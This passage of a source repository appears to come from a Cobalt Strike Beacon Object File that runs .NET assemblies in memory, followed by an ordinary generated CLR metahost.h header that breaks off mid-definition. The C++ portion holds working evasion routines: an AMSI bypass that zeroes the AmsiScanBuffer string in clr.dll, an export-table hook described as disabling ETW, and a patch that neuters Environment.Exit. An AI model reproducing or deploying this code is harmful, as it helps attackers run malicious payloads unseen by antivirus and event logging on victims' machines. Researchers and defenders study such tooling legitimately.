241 | Assembly->Release(); 242 | 243 | HResult = runtimeHost->UnloadDomain(AppDomain); 244 | if (HResult != S_OK) 245 | BeaconPrintf(CALLBACK_OUTPUT, "Failed to unload"); 246 | 247 | if (AppDomain) 248 | AppDomain->Release(); 249 | 250 | if (IUAppDomain) 251 | IUAppDomain->Release(); 252 | 253 | if (runtimeHost) 254 | runtimeHost->Release(); 255 | 256 | if (runtimeInfo) 257 | runtimeInfo->Release(); 258 | 259 | if (metaHost) 260 | metaHost->Release(); 261 | 262 | return TRUE; 263 | 264 | } 265 | 266 | // Determine if .NET assembly is v4 or v2 267 | BOOL FindVersion(void* assembly, int length) // Credits to Anthemtotheego 268 | { 269 | char* assembly_c; 270 | assembly_c = (char*)assembly; 271 | char v4[] = { 0x76,0x34,0x2E,0x30,0x2E,0x33,0x30,0x33,0x31,0x39 }; 272 | 273 | for (int i = 0; i < length; i++) 274 | { 275 | for (int j = 0; j < 10; j++) 276 | { 277 | if (v4[j] != assembly_c[i + j]) 278 | { 279 | break; 280 | } 281 | else 282 | { 283 | if (j == (9)) 284 | { 285 | return 1; 286 | } 287 | } 288 | } 289 | } 290 | return 0; 291 | } 292 | 293 | /* Not using but keeping here just in case 294 | void BeaconPrintfW(int type, const wchar_t* fmt, ...) // I think chatgpt cooked this up, I forgot 295 | { 296 | wchar_t wideStr[MAX_PATH]; 297 | char asciiStr[MAX_PATH]; 298 | va_list args; 299 | va_start(args, fmt); 300 | MSVCRT$_vsnwprintf_s(wideStr, MAX_PATH, _TRUNCATE, fmt, args); 301 | KERNEL32$WideCharToMultiByte(CP_ACP, 0, wideStr, -1, asciiStr, MAX_PATH, NULL, NULL); 302 | BeaconPrintf(type, asciiStr); 303 | va_end(args); 304 | } 305 | */ 306 | 307 | // Patch clr.dll to bypass AMSI 308 | BOOL PatchAmsiScanBuffer(HMODULE moduleHandle) // Credits: Practical Security Analytics LLC (lightly modified) 309 | { 310 | HMODULE hModule = moduleHandle; 311 | typedef (WINAPI* fnGetModuleInformation)(HANDLE hProcess, HMODULE hModule, LPMODULEINFO lpmodinfo, DWORD cb); 312 | fnGetModuleInformation pGetModuleInformation = (fnGetModuleInformation)KERNEL32$GetProcAddress(KERNEL32$LoadLibraryA("psapi.dll"), "GetModuleInformation"); 313 | 314 | MODULEINFO modInfo; 315 | if (!pGetModuleInformation((HANDLE)-1, hModule, &modInfo, sizeof(modInfo))) 316 | return FALSE; 317 | 318 | const char* targetString = "AmsiScanBuffer"; 319 | int strLength = MSVCRT$strlen(targetString); 320 | 321 | PVOID foundAddress = NULL; 322 | PBYTE pModule = (PBYTE)hModule; 323 | for (size_t i = 0; i < modInfo.SizeOfImage - strLength; i++) 324 | { 325 | if (MSVCRT$memcmp(pModule+i, targetString, strLength) == 0) 326 | { 327 | foundAddress = pModule + i; 328 | break; 329 | } 330 | } 331 | 332 | if (foundAddress == NULL) 333 | return TRUE; // Already patched 334 | 335 | DWORD oldProt; 336 | KERNEL32$VirtualProtect(foundAddress, strLength, PAGE_READWRITE, &oldProt); 337 | MSVCRT$memset(foundAddress, 0, strLength); 338 | KERNEL32$VirtualProtect(foundAddress, strLength, oldProt, &oldProt); 339 | 340 | return TRUE; 341 | } 342 | 343 | 344 | // Dummy function for EAT Hooking 345 | #pragma optimize("", off) 346 | BOOL DummyFunction(void) 347 | { 348 | return TRUE; 349 | } 350 | #pragma optimize("", on) 351 | 352 | 353 | // EAT Hook for ETW bypass 354 | DWORD EATHook(HMODULE mod, char* FN, VOID* HA, VOID** OA) // Credits: Jimster480 (modified) 355 | { 356 | if (!mod) 357 | return 0; 358 | 359 | IMAGE_DOS_HEADER* dosHeader = (IMAGE_DOS_HEADER*)mod; 360 | if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) 361 | return 0; 362 | 363 | IMAGE_NT_HEADERS* ntHeaders = (IMAGE_NT_HEADERS*)((BYTE*)mod + dosHeader->e_lfanew); 364 | // Optionally check ntHeaders->Signature if needed 365 | 366 | DWORD exportRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 367 | if (!exportRVA) 368 | return 0; 369 | 370 | 371 | IMAGE_EXPORT_DIRECTORY* exportDir = (IMAGE_EXPORT_DIRECTORY*)((BYTE*)mod + exportRVA); 372 | 373 | // Loop over the number of exported names instead of NumberOfFunctions 374 | for (DWORD i = 0; i < exportDir->NumberOfNames; i++) 375 | { 376 | // Get the pointer to the name (RVA) and then convert it to an absolute address 377 | DWORD* nameRVA = (DWORD*)((BYTE*)mod + exportDir->AddressOfNames + (i * sizeof(DWORD))); 378 | char* currName = (char*)((BYTE*)mod + (*nameRVA)); 379 | 380 | if (MSVCRT$strcmp(currName, FN) == 0) 381 | { 382 | // Get the corresponding ordinal from the NameOrdinals table 383 | WORD* ordinal = (WORD*)((BYTE*)mod + exportDir->AddressOfNameOrdinals + (i * sizeof(WORD))); 384 | // Now use the ordinal to get the function address from the AddressOfFunctions table 385 | DWORD* funcRVA = (DWORD*)((BYTE*)mod + exportDir->AddressOfFunctions + ((*ordinal) * sizeof(DWORD))); 386 | 387 | DWORD oldProtect; 388 | // Change memory protection to allow writing to the function pointer 389 | if (!KERNEL32$VirtualProtect(funcRVA, sizeof(DWORD), PAGE_READWRITE, &oldProtect)) 390 | return 0; 391 | 392 | // Save the original function address 393 | *OA = (void*)((BYTE*)mod + (*funcRVA)); 394 | 395 | // Overwrite with our hook (relative address) 396 | *funcRVA = ((UINT64)HA - (UINT64)mod); 397 | 398 | // Restore original protection 399 | DWORD dummy; 400 | KERNEL32$VirtualProtect(funcRVA, sizeof(DWORD), oldProtect, &dummy); 401 | 402 | return 1; 403 | } 404 | } 405 | 406 | return 0; 407 | } 408 | 409 | 410 | // Patch System.Environment.Exit 411 | BOOL patchExit(ICorRuntimeHost* runtimeHost) // Credits: Kyle Avery "Unmanaged .NET patching" 412 | { 413 | IUnknown* appDomainUnk; 414 | runtimeHost->GetDefaultDomain(&appDomainUnk); 415 | 416 | _AppDomain* appDomain; 417 | appDomainUnk->QueryInterface(xIID_AppDomain, (VOID**)&appDomain); 418 | 419 | _Assembly* mscorlib; 420 | appDomain->Load_2(OLEAUT32$SysAllocString(L"mscorlib, Version=4.0.0.0"), &mscorlib); 421 | 422 | 423 | 424 | _Type* exitClass; 425 | mscorlib->GetType_2(OLEAUT32$SysAllocString(L"System.Environment"), &exitClass); 426 | 427 | _MethodInfo* exitInfo; 428 | BindingFlags exitFlags = (BindingFlags)(BindingFlags_Public | BindingFlags_Static); 429 | exitClass->GetMethod_2(OLEAUT32$SysAllocString(L"Exit"), exitFlags, &exitInfo); 430 | 431 | 432 | 433 | 434 | _Type* methodInfoClass; 435 | mscorlib->GetType_2(OLEAUT32$SysAllocString(L"System.Reflection.MethodInfo"), &methodInfoClass); 436 | 437 | _PropertyInfo* methodHandleProp; 438 | BindingFlags methodHandleFlags = (BindingFlags)(BindingFlags_Instance | BindingFlags_Public); 439 | methodInfoClass->GetProperty(OLEAUT32$SysAllocString(L"MethodHandle"), methodHandleFlags, &methodHandleProp); 440 | 441 | VARIANT methodHandlePtr = { 0 }; 442 | methodHandlePtr.vt = VT_UNKNOWN; 443 | methodHandlePtr.punkVal = exitInfo; 444 | 445 | SAFEARRAY* methodHandleArgs = OLEAUT32$SafeArrayCreateVector(VT_EMPTY, 0, 0); 446 | VARIANT methodHandleVal = { 0 }; 447 | methodHandleProp->GetValue(methodHandlePtr, methodHandleArgs, &methodHandleVal); 448 | 449 | 450 | 451 | 452 | _Type* rtMethodHandleType; 453 | mscorlib->GetType_2(OLEAUT32$SysAllocString(L"System.RuntimeMethodHandle"), &rtMethodHandleType); 454 | 455 | _MethodInfo* getFuncPtrMethodInfo; 456 | BindingFlags getFuncPtrFlags = (BindingFlags)(BindingFlags_Public | BindingFlags_Instance); 457 | rtMethodHandleType->GetMethod_2(OLEAUT32$SysAllocString(L"GetFunctionPointer"), getFuncPtrFlags, &getFuncPtrMethodInfo); 458 | 459 | SAFEARRAY* getFuncPtrArgs = OLEAUT32$SafeArrayCreateVector(VT_EMPTY, 0, 0); 460 | VARIANT exitPtr = { 0 }; 461 | getFuncPtrMethodInfo->Invoke_3(methodHandleVal, getFuncPtrArgs, &exitPtr); 462 | 463 | 464 | 465 | DWORD oldProt = 0; 466 | BYTE patch = 0xC3; 467 | //BeaconPrintf(CALLBACK_OUTPUT, "[U] Exit function pointer: 0x%p\n", exitPtr.byref); 468 | KERNEL32$VirtualProtect(exitPtr.byref, 1, PAGE_READWRITE, &oldProt); 469 | MSVCRT$memcpy(exitPtr.byref, &patch, 1); 470 | KERNEL32$VirtualProtect(exitPtr.byref, 1, oldProt, &oldProt); 471 | 472 | return TRUE; 473 | } 474 | 475 | } 476 | -------------------------------------------------------------------------------- /src/metahost.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.00.0603 */ 7 | /* @@MIDL_FILE_HEADING( ) */ 8 | 9 | #pragma warning( disable: 4049 ) /* more than 64k source lines */ 10 | 11 | 12 | /* verify that the version is high enough to compile this file*/ 13 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 14 | #define __REQUIRED_RPCNDR_H_VERSION__ 475 15 | #endif 16 | 17 | /* verify that the version is high enough to compile this file*/ 18 | #ifndef __REQUIRED_RPCSAL_H_VERSION__ 19 | #define __REQUIRED_RPCSAL_H_VERSION__ 100 20 | #endif 21 | 22 | #include "rpc.h" 23 | #include "rpcndr.h" 24 | 25 | #ifndef __RPCNDR_H_VERSION__ 26 | #error this stub requires an updated version of 27 | #endif // __RPCNDR_H_VERSION__ 28 | 29 | #ifndef COM_NO_WINDOWS_H 30 | #include "windows.h" 31 | #include "ole2.h" 32 | #endif /*COM_NO_WINDOWS_H*/ 33 | 34 | #ifndef __metahost_h__ 35 | #define __metahost_h__ 36 | 37 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 38 | #pragma once 39 | #endif 40 | 41 | /* Forward Declarations */ 42 | 43 | #ifndef __ICLRMetaHost_FWD_DEFINED__ 44 | #define __ICLRMetaHost_FWD_DEFINED__ 45 | typedef interface ICLRMetaHost ICLRMetaHost; 46 | 47 | #endif /* __ICLRMetaHost_FWD_DEFINED__ */ 48 | 49 | 50 | #ifndef __ICLRMetaHostPolicy_FWD_DEFINED__ 51 | #define __ICLRMetaHostPolicy_FWD_DEFINED__ 52 | typedef interface ICLRMetaHostPolicy ICLRMetaHostPolicy; 53 | 54 | #endif /* __ICLRMetaHostPolicy_FWD_DEFINED__ */ 55 | 56 | 57 | #ifndef __ICLRProfiling_FWD_DEFINED__ 58 | #define __ICLRProfiling_FWD_DEFINED__ 59 | typedef interface ICLRProfiling ICLRProfiling; 60 | 61 | #endif /* __ICLRProfiling_FWD_DEFINED__ */ 62 | 63 | 64 | #ifndef __ICLRDebuggingLibraryProvider_FWD_DEFINED__ 65 | #define __ICLRDebuggingLibraryProvider_FWD_DEFINED__ 66 | typedef interface ICLRDebuggingLibraryProvider ICLRDebuggingLibraryProvider; 67 | 68 | #endif /* __ICLRDebuggingLibraryProvider_FWD_DEFINED__ */ 69 | 70 | 71 | #ifndef __ICLRDebugging_FWD_DEFINED__ 72 | #define __ICLRDebugging_FWD_DEFINED__ 73 | typedef interface ICLRDebugging ICLRDebugging; 74 | 75 | #endif /* __ICLRDebugging_FWD_DEFINED__ */ 76 | 77 | 78 | #ifndef __ICLRRuntimeInfo_FWD_DEFINED__ 79 | #define __ICLRRuntimeInfo_FWD_DEFINED__ 80 | typedef interface ICLRRuntimeInfo ICLRRuntimeInfo; 81 | 82 | #endif /* __ICLRRuntimeInfo_FWD_DEFINED__ */ 83 | 84 | 85 | #ifndef __ICLRStrongName_FWD_DEFINED__ 86 | #define __ICLRStrongName_FWD_DEFINED__ 87 | typedef interface ICLRStrongName ICLRStrongName; 88 | 89 | #endif /* __ICLRStrongName_FWD_DEFINED__ */ 90 | 91 | 92 | #ifndef __ICLRStrongName2_FWD_DEFINED__ 93 | #define __ICLRStrongName2_FWD_DEFINED__ 94 | typedef interface ICLRStrongName2 ICLRStrongName2; 95 | 96 | #endif /* __ICLRStrongName2_FWD_DEFINED__ */ 97 | 98 | 99 | #ifndef __ICLRStrongName3_FWD_DEFINED__ 100 | #define __ICLRStrongName3_FWD_DEFINED__ 101 | typedef interface ICLRStrongName3 ICLRStrongName3; 102 | 103 | #endif /* __ICLRStrongName3_FWD_DEFINED__ */ 104 | 105 | 106 | #ifndef __ICLRMetaHost_FWD_DEFINED__ 107 | #define __ICLRMetaHost_FWD_DEFINED__ 108 | typedef interface ICLRMetaHost ICLRMetaHost; 109 | 110 | #endif /* __ICLRMetaHost_FWD_DEFINED__ */ 111 | 112 | 113 | #ifndef __ICLRMetaHostPolicy_FWD_DEFINED__ 114 | #define __ICLRMetaHostPolicy_FWD_DEFINED__ 115 | typedef interface ICLRMetaHostPolicy ICLRMetaHostPolicy; 116 | 117 | #endif /* __ICLRMetaHostPolicy_FWD_DEFINED__ */ 118 | 119 | 120 | #ifndef __ICLRProfiling_FWD_DEFINED__ 121 | #define __ICLRProfiling_FWD_DEFINED__ 122 | typedef interface ICLRProfiling ICLRProfiling; 123 | 124 | #endif /* __ICLRProfiling_FWD_DEFINED__ */ 125 | 126 | 127 | #ifndef __ICLRDebuggingLibraryProvider_FWD_DEFINED__ 128 | #define __ICLRDebuggingLibraryProvider_FWD_DEFINED__ 129 | typedef interface ICLRDebuggingLibraryProvider ICLRDebuggingLibraryProvider; 130 | 131 | #endif /* __ICLRDebuggingLibraryProvider_FWD_DEFINED__ */ 132 | 133 | 134 | #ifndef __ICLRDebugging_FWD_DEFINED__ 135 | #define __ICLRDebugging_FWD_DEFINED__ 136 | typedef interface ICLRDebugging ICLRDebugging; 137 | 138 | #endif /* __ICLRDebugging_FWD_DEFINED__ */ 139 | 140 | 141 | #ifndef __ICLRRuntimeInfo_FWD_DEFINED__ 142 | #define __ICLRRuntimeInfo_FWD_DEFINED__ 143 | typedef interface ICLRRuntimeInfo ICLRRuntimeInfo; 144 | 145 | #endif /* __ICLRRuntimeInfo_FWD_DEFINED__ */ 146 | 147 | 148 | #ifndef __ICLRStrongName_FWD_DEFINED__ 149 | #define __ICLRStrongName_FWD_DEFINED__ 150 | typedef interface ICLRStrongName ICLRStrongName; 151 | 152 | #endif /* __ICLRStrongName_FWD_DEFINED__ */ 153 | 154 | 155 | /* header files for imported files */ 156 | #include "unknwn.h" 157 | #include "oaidl.h" 158 | #include "ocidl.h" 159 | #include "mscoree.h" 160 | 161 | #ifdef __cplusplus 162 | extern "C"{ 163 | #endif 164 | 165 | 166 | /* interface __MIDL_itf_metahost_0000_0000 */ 167 | /* [local] */ 168 | 169 | #include 170 | #if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) 171 | 172 | STDAPI CLRCreateInstance(REFCLSID clsid, REFIID riid, /*iid_is(riid)*/ LPVOID *ppInterface); 173 | EXTERN_GUID(CLSID_CLRStrongName, 0xB79B0ACD, 0xF5CD, 0x409b, 0xB5, 0xA5, 0xA1, 0x62, 0x44, 0x61, 0x0B, 0x92); 174 | EXTERN_GUID(IID_ICLRMetaHost, 0xD332DB9E, 0xB9B3, 0x4125, 0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16); 175 | EXTERN_GUID(CLSID_CLRMetaHost, 0x9280188d, 0xe8e, 0x4867, 0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde); 176 | EXTERN_GUID(IID_ICLRMetaHostPolicy, 0xE2190695, 0x77B2, 0x492e, 0x8E, 0x14, 0xC4, 0xB3, 0xA7, 0xFD, 0xD5, 0x93); 177 | EXTERN_GUID(CLSID_CLRMetaHostPolicy, 0x2ebcd49a, 0x1b47, 0x4a61, 0xb1, 0x3a, 0x4a, 0x3, 0x70, 0x1e, 0x59, 0x4b); 178 | EXTERN_GUID(IID_ICLRDebugging, 0xd28f3c5a, 0x9634, 0x4206, 0xa5, 0x9, 0x47, 0x75, 0x52, 0xee, 0xfb, 0x10); 179 | EXTERN_GUID(CLSID_CLRDebugging, 0xbacc578d, 0xfbdd, 0x48a4, 0x96, 0x9f, 0x2, 0xd9, 0x32, 0xb7, 0x46, 0x34); 180 | EXTERN_GUID(IID_ICLRRuntimeInfo, 0xBD39D1D2, 0xBA2F, 0x486a, 0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91); 181 | EXTERN_GUID(IID_ICLRStrongName, 0x9FD93CCF, 0x3280, 0x4391, 0xB3, 0xA9, 0x96, 0xE1, 0xCD, 0xE7, 0x7C, 0x8D); 182 | EXTERN_GUID(IID_ICLRStrongName2, 0xC22ED5C5, 0x4B59, 0x4975, 0x90, 0xEB, 0x85, 0xEA, 0x55, 0xC0, 0x06, 0x9B); 183 | EXTERN_GUID(IID_ICLRStrongName3, 0x22c7089b, 0xbbd3, 0x414a, 0xb6, 0x98, 0x21, 0x0f, 0x26, 0x3f, 0x1f, 0xed); 184 | EXTERN_GUID(CLSID_CLRDebuggingLegacy, 0xDF8395B5, 0xA4BA, 0x450b, 0xA7, 0x7C, 0xA9, 0xA4, 0x77, 0x62, 0xC5, 0x20); 185 | EXTERN_GUID(CLSID_CLRProfiling, 0xbd097ed8, 0x733e, 0x43fe, 0x8e, 0xd7, 0xa9, 0x5f, 0xf9, 0xa8, 0x44, 0x8c); 186 | EXTERN_GUID(IID_ICLRProfiling, 0xb349abe3, 0xb56f, 0x4689, 0xbf, 0xcd, 0x76, 0xbf, 0x39, 0xd8, 0x88, 0xea); 187 | EXTERN_GUID(IID_ICLRDebuggingLibraryProvider, 0x3151c08d, 0x4d09, 0x4f9b, 0x88, 0x38, 0x28, 0x80, 0xbf, 0x18, 0xfe, 0x51); 188 | 189 | typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )( 190 | REFCLSID clsid, 191 | REFIID riid, 192 | LPVOID *ppInterface); 193 | 194 | typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )( 195 | REFCLSID clsid, 196 | REFIID riid, 197 | LPVOID *ppInterface); 198 | 199 | 200 | typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void); 201 | 202 | typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void); 203 | 204 | typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )( 205 | ICLRRuntimeInfo *pRuntimeInfo, 206 | CallbackThreadSetFnPtr pfnCallbackThreadSet, 207 | CallbackThreadUnsetFnPtr pfnCallbackThreadUnset); 208 | 209 | 210 | 211 | extern RPC_IF_HANDLE __MIDL_itf_metahost_0000_0000_v0_0_c_ifspec; 212 | extern RPC_IF_HANDLE __MIDL_itf_metahost_0000_0000_v0_0_s_ifspec; 213 | 214 | #ifndef __ICLRMetaHost_INTERFACE_DEFINED__ 215 | #define __ICLRMetaHost_INTERFACE_DEFINED__ 216 | 217 | /* interface ICLRMetaHost */ 218 | /* [object][local][helpstring][version][uuid] */ 219 | 220 | 221 | EXTERN_C const IID IID_ICLRMetaHost; 222 | 223 | #if defined(__cplusplus) && !defined(CINTERFACE) 224 | 225 | MIDL_INTERFACE("D332DB9E-B9B3-4125-8207-A14884F53216") 226 | ICLRMetaHost : public IUnknown 227 | { 228 | public: 229 | virtual HRESULT STDMETHODCALLTYPE GetRuntime( 230 | /* [in] */ LPCWSTR pwzVersion, 231 | /* [in] */ REFIID riid, 232 | /* [retval][iid_is][out] */ LPVOID *ppRuntime) = 0; 233 | 234 | virtual HRESULT STDMETHODCALLTYPE GetVersionFromFile( 235 | /* [in] */ LPCWSTR pwzFilePath, 236 | /* [annotation][size_is][out] */ 237 | _Out_writes_all_(*pcchBuffer) LPWSTR pwzBuffer, 238 | /* [out][in] */ DWORD *pcchBuffer) = 0; 239 | 240 | virtual HRESULT STDMETHODCALLTYPE EnumerateInstalledRuntimes( 241 | /* [retval][out] */ IEnumUnknown **ppEnumerator) = 0; 242 | 243 | virtual HRESULT STDMETHODCALLTYPE EnumerateLoadedRuntimes( 244 | /* [in] */ HANDLE hndProcess, 245 | /* [retval][out] */ IEnumUnknown **ppEnumerator) = 0; 246 | 247 | virtual HRESULT STDMETHODCALLTYPE RequestRuntimeLoadedNotification( 248 | /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction) = 0; 249 | 250 | virtual HRESULT STDMETHODCALLTYPE QueryLegacyV2RuntimeBinding( 251 | /* [in] */ REFIID riid, 252 | /* [retval][iid_is][out] */ LPVOID *ppUnk) = 0; 253 | 254 | virtual HRESULT STDMETHODCALLTYPE ExitProcess( 255 | /* [in] */ INT32 iExitCode) = 0; 256 | 257 | }; 258 | 259 | 260 | #else /* C style interface */ 261 | 262 | typedef struct ICLRMetaHostVtbl 263 | { 264 | BEGIN_INTERFACE 265 | 266 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 267 | ICLRMetaHost * This, 268 | /* [in] */ REFIID riid, 269 | /* [annotation][iid_is][out] */ 270 | _COM_Outptr_ void **ppvObject); 271 | 272 | ULONG ( STDMETHODCALLTYPE *AddRef )( 273 | ICLRMetaHost * This); 274 | 275 | ULONG ( STDMETHODCALLTYPE *Release )( 276 | ICLRMetaHost * This); 277 | 278 | HRESULT ( STDMETHODCALLTYPE *GetRuntime )( 279 | ICLRMetaHost * This, 280 | /* [in] */ LPCWSTR pwzVersion, 281 | /* [in] */ REFIID riid, 282 | /* [retval][iid_is][out] */ LPVOID *ppRuntime); 283 | 284 | HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )( 285 | ICLRMetaHost * This, 286 | /* [in] */ LPCWSTR pwzFilePath, 287 | /* [annotation][size_is][out] */ 288 | _Out_writes_all_(*pcchBuffer) LPWSTR pwzBuffer, 289 | /* [out][in] */ DWORD *pcchBuffer); 290 | 291 | HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )( 292 | ICLRMetaHost * This, 293 | /* [retval][out] */ IEnumUnknown **ppEnumerator); 294 | 295 | HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )( 296 | ICLRMetaHost * This, 297 | /* [in] */ HANDLE hndProcess, 298 | /* [retval][out] */ IEnumUnknown **ppEnumerator); 299 | 300 | HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )( 301 | ICLRMetaHost * This, 302 | /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction); 303 | 304 | HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )( 305 | ICLRMetaHost * This, 306 | /* [in] */ REFIID riid, 307 | /* [retval][iid_is][out] */ LPVOID *ppUnk); 308 | 309 | HRESULT ( STDMETHODCALLTYPE *ExitProcess )( 310 | ICLRMetaHost * This, 311 | /* [in] */ INT32 iExitCode); 312 | 313 | END_INTERFACE 314 | } ICLRMetaHostVtbl; 315 | 316 | interface ICLRMetaHost 317 | { 318 | CONST_VTBL struct ICLRMetaHostVtbl *lpVtbl; 319 | }; 320 | 321 | 322 | 323 | #ifdef COBJMACROS 324 | 325 | 326 | #define ICLRMetaHost_QueryInterface(This,riid,ppvObject) \ 327 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 328 | 329 | #define ICLRMetaHost_AddRef(This) \ 330 | ( (This)->lpVtbl -> AddRef(This) ) 331 | 332 | #define ICLRMetaHost_Release(This) \ 333 | ( (This)->lpVtbl -> Release(This) ) 334 | 335 | 336 | #define ICLRMetaHost_GetRuntime(This,pwzVersion,riid,ppRuntime) \ 337 | ( (This)->lpVtbl -> GetRuntime(This,pwzVersion,riid,ppRuntime) ) 338 | 339 | #define ICLRMetaHost_GetVersionFromFile(This,pwzFilePath,pwzBuffer,pcchBuffer) \ 340 | ( (This)->lpVtbl -> GetVersionFromFile(This,pwzFilePath,pwzBuffer,pcchBuffer) ) 341 | 342 | #define ICLRMetaHost_EnumerateInstalledRuntimes(This,ppEnumerator) \ 343 | ( (This)->lpVtbl -> EnumerateInstalledRuntimes(This,ppEnumerator) ) 344 | 345 | #define ICLRMetaHost_EnumerateLoadedRuntimes(This,hndProcess,ppEnumerator) \ 346 | ( (This)->lpVtbl -> EnumerateLoadedRuntimes(This,hndProcess,ppEnumerator) ) 347 | 348 | #define ICLRMetaHost_RequestRuntimeLoadedNotification(This,pCallbackFunction) \ 349 | ( (This)->lpVtbl -> RequestRuntimeLoadedNotification(This,pCallbackFunction) ) 350 | 351 | #define ICLRMetaHost_QueryLegacyV2RuntimeBinding(This,riid,ppUnk) \ 352 | ( (This)->lpVtbl -> QueryLegacyV2RuntimeBinding(This,riid,ppUnk) ) 353 | 354 | #define ICLRMetaHost_ExitProcess(This,iExitCode) \ 355 | ( (This)->lpVtbl -> ExitProcess(This,iExitCode) ) 356 | 357 | #endif /* COBJMACROS */ 358 | 359 | 360 | #endif /* C style interface */ 361 | 362 | 363 | 364 | 365 | #endif /* __ICLRMetaHost_INTERFACE_DEFINED__ */ 366 | 367 | 368 | /* interface __MIDL_itf_metahost_0000_0001 */ 369 | /* [local] */ 370 | 371 | typedef /* [public][public] */ 372 | enum __MIDL___MIDL_itf_metahost_0000_0001_0001 373 | { 374 | METAHOST_POLICY_HIGHCOMPAT = 0, 375 | METAHOST_POLICY_APPLY_UPGRADE_POLICY = 0x8, 376 | METAHOST_POLICY_EMULATE_EXE_LAUNCH = 0x10, 377 | METAHOST_POLICY_SHOW_ERROR_DIALOG = 0x20, 378 | METAHOST_POLICY_USE_PROCESS_IMAGE_PATH = 0x40, 379 | METAHOST_POLICY_ENSURE_SKU_SUPPORTED = 0x80, 380 | METAHOST_POLICY_IGNORE_ERROR_MODE = 0x1000 381 | } METAHOST_POLICY_FLAGS; 382 | 383 | typedef /* [public] */ 384 | enum __MIDL___MIDL_itf_metahost_0000_0001_0002 385 | { 386 | METAHOST_CONFIG_FLAGS_LEGACY_V2_ACTIVATION_POLICY_UNSET = 0, 387 | METAHOST_CONFIG_FLAGS_LEGACY_V2_ACTIVATION_POLICY_TRUE = 0x1, 388 | METAHOST_CONFIG_FLAGS_LEGACY_V2_ACTIVATION_POLICY_FALSE = 0x2, 389 | METAHOST_CONFIG_FLAGS_LEGACY_V2_ACTIVATION_POLICY_MASK = 0x3 390 | } METAHOST_CONFIG_FLAGS; 391 | 392 | 393 | 394 | extern RPC_IF_HANDLE __MIDL_itf_metahost_0000_0001_v0_0_c_ifspec; 395 | extern RPC_IF_HANDLE __MIDL_itf_metahost_0000_0001_v0_0_s_ifspec; 396 | 397 | #ifndef __ICLRMetaHostPolicy_INTERFACE_DEFINED__ 398 | #define __ICLRMetaHostPolicy_INTERFACE_DEFINED__ 399 | 400 | /* interface ICLRMetaHostPolicy */ 401 | /* [object][local][helpstring][version][uuid] */ 402 | 403 | 404 | EXTERN_C const IID IID_ICLRMetaHostPolicy; 405 | 406 | #if defined(__cplusplus) && !defined(CINTERFACE) 407 | 408 | MIDL_INTERFACE("E2190695-77B2-492e-8E14-C4B3A7FDD593") 409 | ICLRMetaHostPolicy : public IUnknown 410 | { 411 | public: 412 | virtual HRESULT STDMETHODCALLTYPE GetRequestedRuntime( 413 | /* [in] */ METAHOST_POLICY_FLAGS dwPolicyFlags, 414 | /* [in] */ LPCWSTR pwzBinary, 415 | /* [in] */ IStream *pCfgStream, 416 | /* [annotation][size_is][out][in] */ 417 | _Inout_updates_all_opt_(*pcchVersion) LPWSTR pwzVersion, 418 | /* [out][in] */ DWORD *pcchVersion, 419 | /* [annotation][size_is][out] */ 420 | _Out_writes_all_opt_(*pcchImageVersion) LPWSTR pwzImageVersion, 421 | /* [out][in] */ DWORD *pcchImageVersion, 422 | /* [out] */ DWORD *pdwConfigFlags, 423 | /* [in] */ REFIID riid, 424 | /* [retval][iid_is][out] */ LPVOID *ppRuntime) = 0; 425 | 426 | }; 427 | 428 | 429 | #else /* C style interface */ 430 | 431 | typedef struct ICLRMetaHostPolicyVtbl 432 | { 433 | BEGIN_INTERFACE 434 | 435 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 436 | ICLRMetaHostPolicy * This, 437 | /* [in] */ REFIID riid, 438 | /* [annotation][iid_is][out] */ 439 | _COM_Outptr_ void **ppvObject); 440 | 441 | ULONG ( STDMETHODCALLTYPE *AddRef )( 442 | ICLRMetaHostPolicy * This); 443 | 444 | ULONG ( STDMETHODCALLTYPE *Release )( 445 | ICLRMetaHostPolicy * This); 446 | 447 | HRESULT ( STDMETHODCALLTYPE *GetRequestedRuntime )( 448 | ICLRMetaHostPolicy * This, 449 | /* [in] */ METAHOST_POLICY_FLAGS dwPolicyFlags, 450 | /* [in] */ LPCWSTR pwzBinary, 451 | /* [in] */ IStream *pCfgStream, 452 | /* [annotation][size_is][out][in] */ 453 | _Inout_updates_all_opt_(*pcchVersion) LPWSTR pwzVersion, 454 | /* [out][in] */ DWORD *pcchVersion, 455 | /* [annotation][size_is][out] */ 456 | _Out_writes_all_opt_(*pcchImageVersion) LPWSTR pwzImageVersion, 457 | /* [out][in] */ DWORD *pcchImageVersion, 458 | /* [out] */ DWORD *pdwConfigFlags, 459 | /* [in] */ REFIID riid, 460 | /* [retval][iid_is][out] */ LPVOID *ppRuntime); 461 | 462 | END_INTERFACE 463 | } ICLRMetaHostPolicyVtbl; 464 | 465 | interface ICLRMetaHostPolicy 466 | { 467 | CONST_VTBL struct ICLRMetaHostPolicyVtbl *lpVtbl; 468 | }; 469 | 470 | 471 | 472 | #ifdef COBJMACROS 473 | 474 | 475 | #define ICLRMetaHostPolicy_QueryInterface(This,riid,ppvObject) \ 476 | ( (This)->lpVtbl -> 